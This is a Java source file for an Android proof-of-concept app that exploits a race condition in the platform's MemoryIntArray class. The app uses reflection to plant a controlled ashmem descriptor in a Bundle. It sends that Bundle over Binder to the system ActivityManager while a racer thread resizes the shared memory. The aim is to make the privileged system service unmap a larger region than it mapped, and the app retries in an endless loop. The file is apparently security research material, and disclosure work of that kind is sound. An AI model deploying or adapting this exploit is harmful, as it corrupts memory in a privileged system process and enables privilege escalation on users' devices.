package com.example.laginimaineb.memoryintarrayracepoc;

import android.os.IBinder;
import android.os.Parcel;
import android.os.ParcelFileDescriptor;
import android.os.Parcelable;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.system.Os;
import android.util.Log;
import android.widget.TextView;

import java.io.BufferedReader;
import java.io.File;
import java.io.FileDescriptor;
import java.io.FileReader;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;

import static android.system.OsConstants.O_RDWR;

public class MainActivity extends AppCompatActivity {

    // Used to load the 'native-lib' library on application startup.
    static {
        System.loadLibrary("native-lib");
    }

    /**
     * The size of the small ashmem region used.
     */
    private static final int SMALL_ASHMEM_SIZE = 512;


    /**
     * The size of the large ashmem region used.
     */
    private static final int LARGE_ASHMEM_SIZE = 0x1000000;

    /**
     * The logtag used.
     */
    private static final String TAG = "MemoryIntArrayRacePoc";

    /**
     * The command code used when transferring a Bundle to be unparcelled.
     */
    private static final int CONVERT_TO_TRANSLUCENT_TRANSACTION = IBinder.FIRST_CALL_TRANSACTION+174;

    /**
     * Calls ASHMEM_SET_SIZE on the given file descriptor.
     * @param fd The descriptor
     * @param size The new size of the descriptor
     * @return The result of the ASHMEM_SET_SIZE ioctl
     */
    public native int setAshmemSize(int fd, int size);

    /**
     * Reads the given file fully.
     * @param file The file to read.
     * @return The string contents of the file.
     * @throws IOException If the file couldn't be read.
     */
    private static String readFully(File file) throws IOException {
        StringBuilder builder = new StringBuilder();
        BufferedReader reader = null;
        try {
            reader = new BufferedReader(new FileReader(file));
            String line;
            while ((line = reader.readLine()) != null)
                builder.append(line).append('\n');
            return builder.toString();
        } finally {
            if (reader != null)
                try {
                    reader.close();
                } catch (IOException ex) {
                    //Nothing more we can do at this point
                }
        }
    }

    /**
     * Returns the maximal value of a PID on the system.
     * @return The maximal value of a PID on the system.
     * @throws IOException If the PID file couldn't be read.
     */
    public int getMaxPid() throws IOException {
        return Integer.parseInt(readFully(new File("/proc/sys/kernel/pid_max")).trim());
    }

    /**
     * Tries to trigger the race condition in MemoryIntArray to cause it to unmap a larger region
     * than the one initially mapped.
     *
     * @param array The MemoryIntArray instance to be modified and parcelled.
     * @throws Exception If the exploit couldn't be executed.
     */
    public void doRace(Object array, ParcelFileDescriptor parcelFd, ParcelFileDescriptor additionalParcelDesc, final int fd, final int additionalFd) throws Exception {

        //Replacing the descriptor in the MemoryIntArray with a new controlled ashmem FD
        Field parcelFdField = array.getClass().getDeclaredField("mFd");
        parcelFdField.setAccessible(true);
        parcelFdField.set(array, parcelFd);

        //Putting the poisoned object in a bundle
        final Bundle bundle = new Bundle(array.getClass().getClassLoader());
        bundle.putParcelable("obj", (Parcelable)array);

        //Creating a new ashmem file descriptor to fix the ashmem size in the parcel (avoiding the
        //UBSAN crash from underflowing an unsigned variable)
        bundle.putParcelable("additional", additionalParcelDesc);


        //Starting the racer thread
        new Thread(new Runnable() {
            public void run() {
                while (setAshmemSize(fd, SMALL_ASHMEM_SIZE) >= 0);
                setAshmemSize(additionalFd, SMALL_ASHMEM_SIZE);
                setAshmemSize(fd, LARGE_ASHMEM_SIZE);
                Log.e(TAG, "Race condition triggered!");
            }
        }).start();

        //Sending out the poisoned request
        IBinder amBinder = (IBinder)Class.forName("android.os.ServiceManager").getMethod("getService", String.class).invoke(null, "activity");
        Parcel reply = Parcel.obtain();
        Parcel data = Parcel.obtain();
        data.writeInterfaceToken("android.app.IActivityManager");
        data.writeStrongBinder((IBinder)this.getClass().getMethod("getActivityToken").invoke(this));
        data.writeInt(1); //is bundle present?
        data.writeBundle(bundle);
        try {
            amBinder.transact(CONVERT_TO_TRANSLUCENT_TRANSACTION, data, reply, 0);
        } catch (Exception ex) {}

        //Cleanup
        reply.recycle();
        data.recycle();
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        //Creating an instance of the MemoryIntArray
        //We intentionally keep a reference to this object to prevent it from being GCed
        Object arr;
        try {
            Class arrClass = Class.forName("android.util.MemoryIntArray");
            arr = arrClass.getDeclaredConstructor(int.class, boolean.class).newInstance(SMALL_ASHMEM_SIZE, true);
        } catch (Exception ex) {
            Log.e(TAG, "Failed to create MemoryIntArray instance", ex);
            return;
        }

        FileDescriptor desc, additionalDesc;
        int fd, additionalFd;
        ParcelFileDescriptor parcelFd, additionalParcelDesc;
        try {
            //Creating two ashmem descriptors to be serialized
            desc = Os.open("/dev/ashmem", O_RDWR, 0);
            fd = (int)desc.getClass().getMethod("getInt$").invoke(desc);
            parcelFd = ParcelFileDescriptor.fromFd(fd);
            additionalDesc = Os.open("/dev/ashmem", O_RDWR, 0);
            additionalFd = (int)additionalDesc.getClass().getMethod("getInt$").invoke(additionalDesc);
            additionalParcelDesc = ParcelFileDescriptor.fromFd(additionalFd);
        } catch (Exception ex) {
            Log.e(TAG, "Failed to create MemoryIntArray instance", ex);
            return;
        }

        //Indefinitely trying to trigger the race condition
        while (true)
            try {
                setAshmemSize(fd, SMALL_ASHMEM_SIZE);
                setAshmemSize(additionalFd, LARGE_ASHMEM_SIZE);
                doRace(arr, parcelFd, additionalParcelDesc, fd, additionalFd);
            } catch (Exception ex) {
                Log.e(TAG, "Race attempt failed", ex);
            }
    }
}
